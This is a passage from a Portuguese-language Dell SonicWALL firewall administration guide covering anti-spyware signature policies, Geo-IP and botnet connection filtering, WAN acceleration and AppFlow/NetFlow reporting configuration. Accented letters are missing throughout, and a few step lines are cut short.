6. Se voc deseja alterar as configuraes globais para deteco e preveno, selecione
7. As seguintes configuraes permitem que voc selecione usurios/grupos especficos,
intervalos de endereo IP e objetos de programao para serem includos ou excludos
dessa categoria do SonicWALL Anti-Spyware:
Usurios/grupos includos - selecione os Usurios/Grupos que deseja incluir nesta
categoria do SonicWALL
Anti-Spyware. O padro Tudo.
Usurios/grupos excludos - selecione os Usurios/Grupos que deseja excluir desta
categoria do SonicWALL
Anti-Spyware. O padro Nenhum.
Intervalo de endereos IP includos - selecione o intervalo de endereos IP que deseja
incluir nesta categoria do SonicWALL Anti-Spyware. O padro Tudo.
Intervalo de endereos IP excludos - selecione o intervalo de endereos IP que deseja
excluir desta categoria do SonicWALL Anti-Spyware. O padro Nenhum.

Programao - selecione o horrio marcado desejado para a ativao desta categoria do
SonicWALL Anti-Spyware. O padro Sempre ativo.
8. Se voc quiser alterar a configurao Filtro de redundncia de log na configurao global
padro, desmarque a caixa Usar configuraes de categoria para Filtro de
redundncia de log (segundos) e insira um valor de tempo em segundos.
9. Clique em OK para salvar as alteraes.
Dica Se voc selecionar Todas as assinaturas no menu Categoria, todas as categorias e suas
assinaturas sero exibidas no painel Polticas do Anti-Spyware, permitindo que voc
configure a categoria e as assinaturas dentro da categoria.
Redefinio da configurao do SonicWALL Anti-Spyware como padro
Voc pode remover todas as configuraes personalizadas de categoria e assinatura criadas,

bem como redefinir as configuraes globais Impedir tudo e Detectar tudo e as
configuraes de Filtro de redundncia de log (segundos) clicando no boto Redefinir
polticas e configuraes do Anti-Spyware na seo Configuraes globais do Anti-
Spyware.
Configurao de polticas de assinatura

Selecionar Todas as assinaturas no menu Categoria exibe todas as assinaturas organizadas
dentro das categorias. A opo Todas as assinaturas exibe cada assinatura no banco de
dados do Anti-Spyware.
Se as configuraes globais Impedir tudo e Detectar tudo estiverem em vigor para a
categoria, Global ser exibido nas colunas Impedir e Detectar para a categoria e todas as
suas assinaturas.
Selecionar uma categoria de assinatura especfica exibe as assinaturas na categoria.
Nota Voc no pode importar suas assinaturas personalizadas no SonicWALL Anti-Spyware ou

excluir uma entrada de assinatura.
Cuidado Tenha cuidado ao substituir os comportamentos globais de assinatura Spyware de alto

nvel de perigo e Spyware de nvel mdio de perigo, porque voc pode criar
vulnerabilidades. Se voc fizer alteraes e quiser restaurar as configuraes globais
padro de assinatura, clique no boto Redefinir polticas e configuraes do Anti-
Spyware para restaurar as configuraes padro.
Substituio das configuraes de deteco e preveno da categoria para uma assinatura

no SonicOS Standard
Para substituir os atributos de deteco e preveno de categoria para assinaturas, execute


Etapa 1 No painel Polticas do Anti-Spyware, exiba a assinatura que deseja alterar. Clique no cone
de edio na coluna Configurar da entrada para exibir a janela Editar assinatura do Anti-
Spyware.
Etapa 2 Se voc deseja alterar a configurao de categoria para Preveno, selecione Habilitar ou
Etapa 3 Se voc deseja alterar a configurao de categoria para Deteco, selecione Habilitar ou
Etapa 4 Se voc deseja alterar a configurao de categoria para deteco e preveno, selecione
Etapa 5 Se voc quiser alterar a configurao Filtro de redundncia de log na configurao Categoria,
desmarque a caixa Usar configuraes de categoria para Filtro de redundncia de log
(segundos) e insira um valor de tempo em segundos.
Etapa 6 Clique em OK para salvar as alteraes.
Substituio das configuraes de deteco e preveno da categoria para uma assinatura no SonicOS
Enhanced
Para substituir os atributos de deteco e preveno de categoria para assinaturas, execute

Etapa 7 No painel Polticas do Anti-Spyware, exiba a assinatura que deseja alterar. Clique no cone
de edio na coluna Configurar da entrada para exibir a janela Editar Anti-Spyware.
Etapa 8 Se voc deseja alterar a configurao de categoria para Preveno, selecione Habilitar ou
Etapa 9 Se voc deseja alterar a configurao de categoria para Deteco, selecione Habilitar ou
Etapa 10 Se voc deseja alterar a configurao de categoria para deteco e preveno, selecione
Etapa 11 As seguintes configuraes permitem que voc selecione usurios/grupos especficos,
intervalos de endereo IP e objetos de programao para serem includos ou excludos dessa
assinatura do SonicWALL Anti-Spyware:
Usurios/grupos includos - selecione os Usurios/Grupos que deseja incluir nesta
categoria do SonicWALL Anti-Spyware. O padro Tudo.
Usurios/grupos excludos - selecione os Usurios/Grupos que deseja excluir desta
categoria do SonicWALL Anti-Spyware. O padro Nenhum.
Intervalo de endereos IP includos - selecione o intervalo de endereos IP que deseja
incluir nesta assinatura do SonicWALL Anti-Spyware. O padro Tudo.
Intervalo de endereos IP excludos - selecione o intervalo de endereos IP que deseja
excluir desta assinatura do SonicWALL Anti-Spyware. O padro Nenhum.
Programao - selecione o horrio marcado desejado para a ativao desta assinatura do
SonicWALL Anti-Spyware. O padro Sempre ativo.
Etapa 12 Se voc quiser alterar a configurao Filtro de redundncia de log na configurao Categoria,
desmarque a caixa Usar configuraes de categoria para Filtro de redundncia de log
(segundos) e insira um valor de tempo em segundos.
Etapa 13 Clique em OK para salvar as alteraes.

Redefinio das configuraes do SonicWALL Anti-Spyware como padro
Voc pode remover todas as configuraes personalizadas de categoria e assinatura criadas,

bem como redefinir as configuraes globais Impedir tudo e Detectar tudo e as
configuraes de Filtro de redundncia de log (segundos) clicando no boto Redefinir
polticas e configuraes do Anti-Spyware na seo Configuraes globais do Anti-
Spyware.

Captulo 69
Configurando o SonicWALL
Lista negra em tempo real
Filtragem de lista negra em tempo real

Os Servios de segurana > A pgina de Filtro RBL foi movida para o Anti-Spam > Filtro RBL.
Clicar na seleo de Filtro RBL em Servios de segurana no painel de navegao esquerdo
abrir a pgina Anti-Spam > Filtro RBL.
Para obter informaes sobre Filtragem de lista negra em tempo real, consulte Anti-spam >
Filtro de lista negra em tempo real na pgina 807.
Configurando o SonicWALL Lista negra em tempo real | 1263

Captulo 70
Configurando os filtros de Geo-IP e Botnet

Servios de segurana > Filtro Geo-IP na pgina 1265
Servios de segurana > Filtro de botnets na pgina 1269
Servios de segurana > Filtro Geo-IP

O recurso de Filtro Geo-IP permite aos administradores bloquear conexes para ou de um local
geogrfico. O dispositivo de segurana de rede Dell/SonicWALL usa endereos IP para
determinar o local da conexo.
Para configurar a Filtragem de Geo-IP, execute as seguintes etapas:

1. Para bloquear conexes de e para pases listados na tabela abaixo, selecione a opo
Bloquear conexes de/para pases listados na tabela abaixo.
Configurando os filtros de Geo-IP e Botnet | 1265

2. Selecione um dos dois seguintes modos para Filtragem de Geo-IP:
Todas as conexes: Todas conexes de e para o firewall so filtradas.
Conexes com base na regra de firewall: Somente as conexes que correspondem
a uma regra de acesso configurada no firewall so filtradas.
3. Se voc quiser bloquear todas as conexes quando o banco de dados Geo-IP no for
baixado, selecione Bloquear todas as conexes para IPs pblicos se no tiver sido
feito o download do banco de dados de GeoIP.
4. Para registrar os eventos relacionados ao Filtro Geo-IP, selecione Habilitar registro em
log.
5. Em Pases, na tabela Pas bloqueado, selecione os pases a serem bloqueados.
6. Se voc quer para bloquear qualquer pas que no esteja listado, selecione a opo
Bloquear TODOS OS PASES DESCONHECIDOS.
Nota Como alternativa, voc pode configurar uma lista de excluso para todas as conexes para
endereos IP aprovados. Para fazer isso, v para o menu suspenso Objeto de excluso
de Geo-IP e selecione um objeto de endereo ou grupo de endereo. Todos os endereos
IP no objeto de endereo ou grupo sero permitidos, mesmo que sejam de um pas
bloqueado.
Para esse recurso funcionar corretamente, o banco de dados do pas deve ser baixado para o
dispositivo. O indicador de Status na parte superior direita da pgina fica amarela se este
download falhar. O status verde indica que o banco de dados foi baixado com xito. Clique no
boto Status para exibir mais informaes.
Para que o banco de dados do pas seja baixado, o dispositivo deve ser capaz de resolver o
endereo, "geodnsd.global.sonicwall.com".
Quando um usurio tenta acessar uma pgina da Web que de um pas bloqueado, uma
pgina de bloqueio exibida no navegador do usurio.

Nota Se uma conexo a um pas bloqueado de curta durao e o firewall no tem um cache
para o endereo IP, ento a conexo pode no ser bloqueada imediatamente. Como
resultado, conexes a pases bloqueados ocasionalmente podem aparecer no Monitor de
Fluxo de Aplicativo. No entanto, as conexes adicionais para o mesmo endereo IP sero
bloqueadas imediatamente.
Objeto de excluso de Geo-IP

O Objeto de excluso de Geo-IP um grupo de objeto de endereos de rede que especifica
um grupo ou um intervalo de endereos IP a serem excludos do bloqueio do filtro de Geo-IP.
Por exemplo, se todos os endereos IP oriundos do Pas A forem definidos como bloqueados
e um endereo IP do Pas A for detectado, mas estiver na lista de Objeto de excluso de Geo-
IP, ento o trfego para e desse endereo IP ter permisso para passar.
Os usurios podem criar novos objetos de endereo para esse grupo.
Configuraes da pgina de bloqueio da Web

Quando voc seleciona a opo Incluir detalhes do bloqueio do filtro de Geo-IP,
informaes detalhadas, como o motivo pelo qual esse endereo IP est bloqueado, so
exibidas quando a pgina bloqueada. O endereo IP e o pas no qual ele foi detectado so
includos.
Na caixa Texto de alerta, o administrador pode digitar uma mensagem que ser exibida
quando a pgina for bloqueada.
Na caixa cone de logotipo codificado em Base64, o administrador pode alterar o logotipo
DELL padro para outro. Para isso, o administrador deve converter uma imagem GIF para uma
imagem codificada em Base64 e colar a imagem codificada nela.

Diagnsticos de Filtro Geo-IP
A pgina Filtro Geo-IP tem uma seo de Diagnstico contendo:
Boto Mostrar locais resolvidos
Tabela Estatsticas de cache de Geo-IP
Verificar a pesquisa de servidores de localizao geogrfica
As ferramentas de Localizao geogrfica e Pesquisar servidor Botnet podem ser acessadas

da pgina Sistema > Diagnstico.

Servios de segurana > Filtro de botnets
A Filtragem de botnets permite aos administradores bloquear conexes de ou para servidores
de controle e comando de botnets.
Para configurar a filtragem de Botnet, execute as seguintes etapas:

1. Para bloquear todos os servidores designados como servidores Botnet, selecione a opo
Bloquear conexes para/de servidores de controle e comando de botnets.
2. Selecione um dos dois seguintes modos para Filtragem de Botnet:
Todas as conexes: Todas conexes de e para o firewall so filtradas.
Conexes com base na regra de firewall: Somente as conexes que correspondem
a uma regra de acesso configurada no firewall so filtradas.
3. Se voc quiser bloquear todas as conexes quando o banco de dados Botnet no for
baixado, selecione Bloquear todas as conexes para IPs pblicos se no tiver sido
feito o download do banco de dados de Botnet.
4. Para registrar os eventos relacionados ao Filtro de Botnet, selecione Habilitar registro em
log.
Nota Como alternativa, voc pode configurar uma lista de excluso para todas as conexes para
endereos IP aprovados. Para fazer isso, v para o menu suspenso Objeto de excluso
de Botnet e selecione um objeto de endereo ou grupo de endereo.
Nota Se suspeitar que um determinado endereo est incorretamente marcado como um botnet
ou se voc acredita que um endereo deva ser marcado como botnet, voc pode acessar
Pesquisa de status de IP de botnets para reportar esse problema em:
http://botnet.global.sonicwall.com/

Verificando a localizao geogrfica e o status do servidor de
botnet
O Filtro de botnets tambm oferece a capacidade de procurar endereos IP para determinar o
nome de domnio, servidor DNS, o pas de origem e se ele classificado como um servidor de
botnets. Para fazer isso, execute as seguintes etapas:
1. Role para o fim da pgina Servios de segurana > Filtro de botnets.
2. Insira o endereo IP no campo Pesquisar IP e clique em Ir.

Detalhes sobre o endereo IP so exibidos abaixo do ttulo Resultado.
Objeto de excluso de botnets

O Objeto de excluso de botnets um grupo de objeto de endereos de rede que especifica
um grupo ou um intervalo de endereos IP a serem excludos do bloqueio do filtro de Geo-IP.
Por exemplo, se todos os endereos IP oriundos do Pas A forem definidos como bloqueados
e um endereo IP do Pas A for detectado, mas estiver na lista de Objeto de excluso de
botnets, ento o trfego para e desse endereo IP ter permisso para passar.
Os usurios podem criar novos objetos de endereo para esse grupo.
Configuraes da pgina de bloqueio da Web

Quando voc seleciona a opo Incluir detalhes do bloqueio do filtro de botnets,
informaes detalhadas, como o motivo pelo qual esse endereo IP est bloqueado, so
exibidas quando a pgina bloqueada. O endereo IP e o pas no qual ele foi detectado so
includos.
Na caixa Texto de alerta, o administrador pode digitar uma mensagem que ser exibida
quando a pgina for bloqueada.
Na caixa cone de logotipo codificado em Base64, o administrador pode alterar o logotipo
DELL padro para outro. Para isso, o administrador deve converter uma imagem GIF para uma
imagem codificada em Base64 e colar a imagem codificada nela.

Diagnsticos de Filtro de botnets
A pgina Filtro de Botnet tem uma seo de Diagnstico contendo:
Boto Mostrar locais resolvidos
Tabela Estatsticas de cache de botnets
Verificar a pesquisa de servidores Botnet
As ferramentas de Localizao geogrfica e Pesquisar servidor Botnet podem ser acessadas

da pgina Sistema > Diagnstico.

Parte 19
Acelerao de WAN
| 1273
Captulo 71
Acelerao de WAN
Viso geral de Acelerao de WAN

O servio Acelerao de WAN permite que os administradores de rede acelerem o trfego da
WAN entre um site central e um site de filial usando o TCP (Protocolo de controle de
transmisso) e o WFS (Windows File Sharing). O dispositivo da srie WXA da Dell SonicWALL
implantado em conjunto com um dispositivo da srie NSA da Dell SonicWALL. Nesse tipo de
implantao, o dispositivo da srie NSA fornece servios de segurana dinmica, como o
preveno contra ataque, VPN (redes virtuais privadas), roteamento e filtragem de contedo
da Web. O servio de acelerao de WAN pode aumentar o desempenho do aplicativo.
Esta seo contm uma breve viso geral das pginas de interface de gerenciamento de
acelerao de WAN a seguir:
Acelerao de WAN > Status na pgina 1276
Acelerao de WAN > Acelerao de TCP na pgina 1277
Acelerao de WAN > acelerao de WFS na pgina 1277
Acelerao de WAN > Cache da Web na pgina 1278
Acelerao de WAN > Sistema na pgina 1279
Acelerao de WAN > Log na pgina 1279
Para obter informaes detalhadas e procedimentos de configurao, consulte o mais recente
Guia do usurio do Dell SonicWALL WXA.
Acelerao de WAN | 1275

Acelerao de WAN > Status
A pgina Status fornece uma exibio de painel de controle das informaes do sistema,
configurao do dispositivo, acelerao de TCP e acelerao de WFS no dispositivo da srie
WXA da Dell SonicWALL.
Se a acelerao de WAN no estiver habilitada (padro), a pgina Acelerao de WAN > Status
ser exibida da seguinte maneira:
Se a acelerao de WAN estiver habilitada e um dispositivo de WXA for descoberto/

configurado, a pgina Acelerao de WAN > Status exibir o status do servio de acelerao
de WAN:

Acelerao de WAN > Acelerao de TCP
A pgina Acelerao de TCP fornece opes para configurar e monitorar o servio de
acelerao de TCP.
O servio de acelerao de TCP um processo que reduz a quantidade de dados que passa
por meio da WAN usando compactao, o que acelera o trfego selecionado que passa entre
um site central e um site de filial. O trfego selecionado armazenado nos bancos de dados
compartilhados dos dispositivos da srie WXA da Dell SonicWALL como blocos de dados e
marcados com ndices de referncia. Isso permite que os dispositivos da srie WXA envie
apenas os ndices de referncia (que so menores em tamanho) na WAN e no os dados reais
Acelerao de WAN > acelerao de WFS

A pgina Acelerao de WFS fornece opes para configurar e monitorar o servio de
acelerao de WFS.
O servio de acelerao de WFS oferece dois modos de configurao para o servio de

acelerao de WFS: Bsico ou Avanado. O modo de configurao Bsico fornece opes
bsicas de configurao de acelerao de WFS para uma implantao rpida e fcil do recurso
Acelerao de WFS. O modo avanado de configurao oferece opes detalhadas de
configurao de acelerao de WFS para os detalhes do domnio e os compartilhamentos de
arquivos.

Acelerao de WAN > Cache da Web
A pgina Cache da Web fornece opes para configurar e monitorar o servio de cache da Web.
O recurso de cache da Web armazena cpias de pginas da Web que passam por meio da
rede que so frequente e recentemente solicitadas. Portanto, quando um usurio solicitar uma
dessas pginas da Web, ela ser recuperada a partir do cache da Web local, e no da Internet,
economizando tempo de resposta e largura de banda. Estratgias de cache mnimas,
moderadas e agressivas esto disponveis, elas determinam quais objetos so colocados no
cache da Web e quanto tempo eles permanecero l.

Acelerao de WAN > Sistema
A pgina Sistema fornece opes para monitorar e configurar as guias Status do sistema,
Status de interface, Gerenciamento, Configuraes e Firmware.
Acelerao de WAN > Log

A pgina Log exibe uma lista detalhada das mensagens de eventos de log do dispositivo da
srie WXA da Dell SonicWALL.

Parte 20
AppFlow
| 1281
Captulo 72
Configurar o AppFlow
AppFlow > Relatrios de fluxo

Esta seo aborda o gerenciamento das estatsticas do relatrio de fluxo do firewall e as
definies configurveis para enviar dados do AppFlow e em tempo real para o coletor local
ou para servidores AppFlow externos. O AppFlow oferece suporte para formatos de relatrios
AppFlow externos, como a verso 5 do NetFlow, a verso 9 do NetFlow, IPFIX e IPFIX com
extenses.
AppFlow > Relatrios de fluxo na pgina 1283
AppFlow > Servidor GMSFlow na pgina 1299
AppFlow > Servidor AppFlow na pgina 1301
AppFlow > Monitor em tempo real na pgina 1313
AppFlow > Trao AppFlow na pgina 1314
AppFlow > Monitor de AppFlow na pgina 1314
AppFlow > Relatrios AppFlow na pgina 1314
Configurar o AppFlow | 1283

A pgina AppFlow > Relatrios de fluxo inclui configuraes para configurar o firewall, de
forma a visualizar estatsticas com base nos relatrios de fluxo e nos relatrios internos. Nessa
tela, tambm possvel definir as configuraes de relatrios internos e relatrios do servidor
AppFlow.

Estatsticas do relatrio de fluxo na pgina 1284
Configuraes na pgina 1284
Configuraes do servidor AppFlow na pgina 1285
Configuraes do coletor externo na pgina 1285
Configuraes de relatrios de conexo na pgina 1287
Informaes de ativao e implantao do NetFlow na pgina 1288
Tarefas de configurao do usurio na pgina 1289
Tabelas do NetFlow na pgina 1293
Tabelas dinmicas na pgina 1294
Estatsticas do relatrio de fluxo

Esta seo mostra os relatrios dos fluxos que so enviados para o servidor, no coletados,
descartados, armazenados e removidos da memria, relatados e no relatados ao servidor.
Esta seo tambm inclui o nmero de modelos de NetFlow e exportao de informaes de
fluxo de IP (IPFIX) enviados e fluxos estticos gerais reportados.
Configuraes
A seo Configuraes possui opes configurveis para relatrios de fluxo interno local,
relatrios de fluxo externo do servidor AppFlow e coletor IPFIX.
Enviar AppFlow para coletor local Esta configurao habilita a coleta de relatrios
AppFlow em um servidor interno em seu firewall.

Habilitar coleta de dados em tempo real Estas configuraes habilitam a coleta de dados
em tempo real em seu firewall. Quando esta configurao estiver desabilitada, o monitor
em tempo real no coleta nem exibe os dados de streaming.
Coletar dados em tempo real para Selecione no menu suspenso os grficos de
streaming para exibir na pgina Monitor em tempo real:
Principais aplicativos Exibe o grfico Aplicativos.
Bits por segundo Exibe o grfico Largura de banda.
Pacotes por segundo Exibe o grfico Taxa de pacote.
Tamanho mdio do pacote Exibe o grfico Tamanho do pacote.
Conexes por segundo Exibe os grficos Taxa de conexo e Contagem de
conexes.
Utilitrio de ncleo Exibe o grfico Monitor de vrios ncleos.
Utilitrio de memria exibe o grfico Uso de memria.
Habilitar agregao de coleta de dados de relatrio de AppFlow Esta configurao
habilita a coleta de relatrios AppFlow em seu firewall. Quando esta configurao estiver
desabilitada, os relatrios AppFlow no coletaro nem exibiro dados.
Configuraes do servidor AppFlow

Esta seo fornece ao administrador de rede a capacidade de iniciar o envio de dados Appflow
e dados em tempo real para um servidor AppFlow externo da SonicWALL.
Enviar AppFlow para o servidor AppFlow da SonicWALL Esta configurao permite
que voc inicie o envio de registros AppFlow para um servidor AppFlow externo.
Enviar dados em tempo real para o servidor AppFlow da SonicWALL Esta
configurao permite que voc inicie o envio de registros em tempo real para um servidor
AppFlow externo.
Configuraes do coletor externo

Esta seo fornece as definies de configurao de relatrios AppFlow para um coletor IPFIX
externo.
Enviar dados AppFlow e em tempo real para o coletor externo A marcao desta
caixa de seleo permite que os fluxos especificados sejam reportados para um coletor de
fluxo externo.
Formato de relatrios AppFlow externos Se a opo "Reportar para coletor de fluxo
EXTERNO" estiver selecionada, voc deve especificar o tipo de relatrios de fluxo na lista
fornecida no menu suspenso: NetFlow verso 5, NetFlow verso 9, IPFIX ou IPFIX com
extenses. Se o tipo de relatrio estiver configurado para as verses 5, 9 ou IPFIX do
NetFlow, ento qualquer coletor de terceiros pode ser usado para mostrar fluxos
reportados do dispositivo. Ele usa os tipos de dados padro, conforme definido em IETF.
Se o tipo de relatrio estiver configurado para IPFIX com extenses, s possvel usar os
coletores com deteco de fluxo da SonicWALL.
Nota Ao usar IPFIX com extenses, selecione um coletor de terceiros que detecte
fluxo da SonicWALL, como o SonicWALL Scrutinizer.

Para verses NetFlow e tipos de relatrios IPFIX, somente os fluxos relacionados
conexo so reportados de acordo com o padro. Para IPFIX com extenses, os fluxos
relacionados conexo so reportados com tipos de dados especficos da SonicWALL,
bem como vrias outras tabelas para correlacionar fluxos com usurios, aplicativos, vrus,
VPN, etc.
Endereo IP do coletor externo Especifique o endereo IP do coletor externo. O
endereo IP deve ser alcanvel a partir do firewall da SonicWALL para que o coletor gere
relatrios de fluxo.
IP de origem para usar para o coletor em um tnel VPN Se o coletor externo tiver de
ser acessado por um tnel VPN, especifique o IP de origem para a poltica de VPN correta.
Nota: Selecione o IP de origem a partir da rede local especificada na poltica de VPN. Se
especificado, os pacotes de fluxo Netflow/IPFIX usaro sempre o caminho da VPN.
Nmero da porta UDP do coletor externo Especifique o nmero da porta UDP para a
qual esto sendo enviados os pacotes Netflow/IPFIX. A porta-padro 2055.
Enviar modelos IPFIX/Netflow em intervalos regulares A marcao desta caixa de
seleo permitir que o dispositivo envie fluxos de modelos em intervalos regulares. O
Netflow verso-9 e o IPFIX usam modelos que precisam ser conhecidos por um coletor
externo antes de enviar dados. De acordo com IETF, um dispositivo de relatrio deve ser
capaz de enviar modelos em intervalos regulares para manter o coletor em sincronia com
o dispositivo. Se o coletor no precisar de modelos em intervalos regulares, voc pode
desabilitar isso aqui. Esta opo est disponvel somente com Netflow verso-9, IPFIX
e IPFIX com extenses.
Enviar AppFlow esttico em intervalos regulares A marcao desta caixa de seleo
permite o envio de appflows especificados.
Enviar AppFlow esttico para as tabelas seguintes Selecione as tabelas de
mapeamento esttico a gerar para um fluxo na lista suspensa. Os valores incluem:
Aplicativos, vrus, spyware, intruses, mapa de localizao, servios, mapas de
classificao, mapa de tabelas e mapa de colunas. Para obter mais informaes sobre
tabelas estticas, consulte Tabelas do NetFlow na pgina 1293.
Durante a execuo no modo IPFIX com extenses, a SonicWALL reporta vrios tipos
de dados em um dispositivo externo para correlacionar informaes de usurio, VPN,
aplicativo, vrus e spyware. Neste modo, os dados so estticos e dinmicos. As
tabelas estticas so necessrias somente uma vez, pois raramente mudam.
Dependendo do recurso do coletor externo, nem todas as tabelas estticas so
necessrias. Voc pode selecionar as tabelas necessrias nesta seo. Esta opo
est disponvel apenas com IPFIX com extenses.
Enviar AppFlow dinmico para as tabelas seguintes Selecione as tabelas de
mapeamento dinmico a gerar para um fluxo na lista suspensa. Os valores incluem:
Conexes, usurios, URLs, classificaes de URL, VPNs, dispositivos, SPAMs, locais e
VoIPs. Para obter mais informaes sobre tabelas dinmicas, consulte Tabelas do NetFlow
na pgina 1293.
Incluir os relatrios adicionais seguintes por IPFIX Selecione relatrios IPFIX
adicionais a gerar para um fluxo. Selecione valores na lista suspensa. Os valores incluem:
Dez principais aplicativos, estatsticas da interface, uso do ncleo e uso da memria.
Durante a execuo no modo IPFIX com extenses, a SonicWALL capaz de reportar
mais dados que no esto relacionados com conexo e fluxos. Estas tabelas so
agrupadas nesta seo (relatrios adicionais). Dependendo do recurso do coletor externo,
nem todas as tabelas adicionais so necessrias. Nesta seo, os usurios podem
selecionar tabelas que so necessrias. Esta opo est disponvel apenas com IPFIX
com extenses.

Aes Clique no boto Gerar TODOS os modelos para iniciar a criao de modelos no
servidor IPFIX. A gerao poder levar at dois minutos. Clique no boto Gerar dados
AppFlow estticos para iniciar a gerao de uma grande quantidade de fluxos no servidor
IPFIX. A gerao poder levar at dois minutos.
Configuraes de relatrios de conexo

Esta seo permite que o administrador de rede configure mediante as quais uma conexo
reportada.
Reportar conexes Selecione a gerao de relatrios de conexo Todos, Baseado em
interface ou Baseado em regras de firewall/aplicativo. Observe que esta opo
aplicvel a relatrios de fluxo internos e externos.
Tudo A marcao desta caixa de seleo habilita qualquer relatrio de conexo.
Baseado em interface A marcao desta caixa de seleo habilita relatrios de fluxo
com base apenas na interface do iniciador ou respondente. Isto permite controlar quais
os fluxos que so reportados interna ou externamente. Se a opo estiver habilitada,
os fluxos so verificados comparativamente configurao de relatrios de fluxo por
interface, localizada na tela Rede > Interface. Se uma interface tiver seus relatrios
de fluxo desabilitados, os fluxos associados a essa interface so ignorados.
Baseado em regras de firewall/aplicativo A marcao desta caixa de seleo
habilita relatrios de fluxo baseados em regras de firewall j existentes. Isto
semelhante ao relatrio baseado em interface; a nica diferena que est
selecionada a verificao de acordo com as regras do firewall, ao invs da verificao
de acordo com as configuraes da interface. Cada regra de firewall tem uma caixa de
seleo para habilitar relatrios de fluxo. Se um fluxo correspondente a uma regra de
firewall for reportado, esta caixa de seleo habilitada forar a verificao da
existncia de habilitao ou no habilitao de relatrios de fluxo nas regras do
firewall. Observe que se esta opo estiver habilitada e nenhuma regra tiver a opo
de relatrios de fluxo habilitada, no sero reportados dados. Esta opo mais uma
forma de controlar quais os fluxos que devem ser reportados.
Relatrio sobre a conexo ABERTA Habilite esta opo para reportar fluxos quando a
conexo aberta. Normalmente isto acontece quando uma conexo estabelecida.
Relatrio sobre a conexo FECHADA Habilite esta opo para reportar fluxos quando
a conexo fechada.
Reportar conexes no tempo limite ativo Habilite esta opo para reportar conexes com
base em sesses com tempo limite ativo.
Nmero de segundos Defina o nmero de segundos que devero decorrer para o
tempo limite ativo. A configurao-padro de 60 segundos. Voc pode configurar o
tempo limite ativo entre 1 segundo e 999 segundos.
Reportar conexes na troca de quilobytes Habilite esta opo para reportar fluxos com
base em um nmero especfico de trfego, em quilobytes. Esta opo ideal para fluxos
que esto ativos por um longo perodo de tempo e precisam ser monitorados.
Quilobytes alterados Quando a opo acima estiver habilitada, especifique o
nmero de quilobytes alterados para reportar.
Reportar UMA VEZ Quando a opo Reportar conexes na troca de quilobytes
estiver habilitada, a ativao desta opo enviar o relatrio apenas uma vez. Deixe a
opo desmarcada se voc desejar que os relatrios sejam enviados periodicamente.
Reportar conexes nas atualizaes seguintes Selecione no menu suspenso para
habilitar a gerao de relatrios de conexo para o seguinte:

Deteco de ameaas Habilite esta opo para reportar fluxos especficos de
ameaas. Em deteces de vrus, intruses ou spyware, o fluxo reportado
novamente.
Deteco de aplicativos Habilite esta opo para reportar fluxos especficos de
aplicativos. Aps executar uma inspeo profunda de pacotes, o firewall capaz de
detectar se um fluxo faz parte de um determinado aplicativo. Assim que for identificado,
o fluxo reportado novamente.
Deteco de usurios Habilite esta opo para reportar fluxos especficos de
usurios. O dispositivo de segurana de rede Dell SonicWALL associa fluxos a uma
deteco baseada em usurio com base nas suas credenciais de login. Assim que for
identificado, o fluxo reportado novamente.
Deteco de tnel de VPN Habilite esta opo para reportar fluxos enviados por
meio do tnel VPN. Depois de os fluxos enviados por meio do tnel VPN serem
identificados, o fluxo reportado novamente.
Outras configuraes de relatrios

Esta seo permite que o administrador de rede configure mediante as quais uma conexo
reportada.
Reportar conexes DESCARTADAS Habilite esta opo para reportar conexes
descartadas. Isto se aplica a conexes que so descartadas devido a regras de firewall.
Ignorar conexes de empilhamento de relatrio Habilite esta opo para ignorar a
gerao de relatrios de conexes de empilhamento. Observe que todos os fluxos
resultantes de trfego iniciado ou finalizado pelo firewall so considerados trfego de
empilhamento.
Incluir os tipos de URL seguintes Selecione o tipo de URLs a gerar em um fluxo.
Selecione valores na lista suspensa. Os valores incluem: Gifs, Jpegs, Pngs, Js, Xmls,
Jsons, Css, Htmls, Aspx e Cms. Esta opo se aplica a AppFlow (interno) e relatrios
externos quando usados com IPFIX com extenses.
Informaes de ativao e implantao do NetFlow

A SonicWALL recomenda um planejamento cuidadoso da implantao do NetFlow com
servios NetFlow ativados em roteadores de agregao/limite estrategicamente localizados
que capturam os dados necessrios para aplicativos de planejamento, monitoramento e
contabilizao. As consideraes de implantao essenciais incluem o seguinte:
Noes bsicas sobre requisitos de coleta de dados condicionados por aplicativo: os
aplicativos de contabilizao podero apenas necessitar de informaes de fluxo de
roteadores de origem e terminao, enquanto os aplicativos de monitoramento podero
exigir uma viso ponto a ponto mais abrangente (intensiva em termos de dados)
Noes bsicas sobre o impacto de topologia de rede e poltica de roteamento na
estratgia de coleta de fluxos: por exemplo, evitar coletar fluxos duplicados ativando o
NetFlow nos roteadores de agregao principais, onde comea e termina o trfego, e no
nos roteadores backbone ou intermedirios que forneceriam visualizaes duplicadas de
informaes do mesmo fluxo
O NetFlow pode ser implantado na interface de gerenciamento do SonicOS para
compreender o nmero de fluxos na rede e o impacto no roteador. A exportao do
NetFlow pode ento ser configurada posteriormente para concluir a implantao do
NetFlow.

O NetFlow , em geral, uma tecnologia de medio de ingresso que deve ser implantada em
interfaces apropriadas em roteadores de agregao/limite ou de acesso WAN para obter uma
viso ampla do trfego de origem e de trmino, de forma a atender s necessidades de clientes
relativamente a dados de planejamento de rede, monitoramento ou contabilizao. O principal
mecanismo para aprimorar o gerenciamento do volume de dados do NetFlow o planejamento
cuidado da sua implantao. O NetFlow pode ser implantado de forma incremental (ou seja,
interface por interface) e estratgica (ou seja, em roteadores bem escolhidos), ao invs de
implantao difundida do NetFlow em todos os roteadores da rede.
Tarefas de configurao do usurio

Dependendo do tipo de fluxos que voc est coletando, ter de determinar qual o tipo de
relatrio que funcionar melhor com a sua instalao e configurao. Esta seo inclui
exemplos de configurao para cada soluo NetFlow suportada, bem como a configurao
de um segundo dispositivo para funcionar como coletor.
Procedimentos de configurao do Netflow verso 5 na pgina 1289
Procedimentos de configurao do Netflow verso 9 na pgina 1289
Procedimentos de configurao de IPFIX (NetFlow verso 10) na pgina 1290
Procedimentos de configurao de IPFIX com extenses na pgina 1291
Procedimentos de configurao do Netflow verso 5

Para configurar relatrios de fluxo tpicos do Netflow verso 5, siga as etapas listadas a seguir.
Etapa 1 Em Configuraes do coletor externo, marque a caixa de seleo Enviar dados AppFlow e
em tempo real para o coletor externo.
Etapa 2 Selecione Netflow verso-5 como o Formato do relatrio de fluxo externo na lista
suspensa.
Etapa 3 Especifique o Endereo IP do coletor externo no campo fornecido.
Etapa 4 Para o IP de origem para usar para o coletor em um tnel VPN, especifique o IP de origem
se o coletor externo tiver de ser acessado por um tnel VPN. Observe que esta etapa
opcional.
Etapa 5 Especifique o Nmero da porta UDP do coletor externo no campo fornecido. A porta-padro
2055.
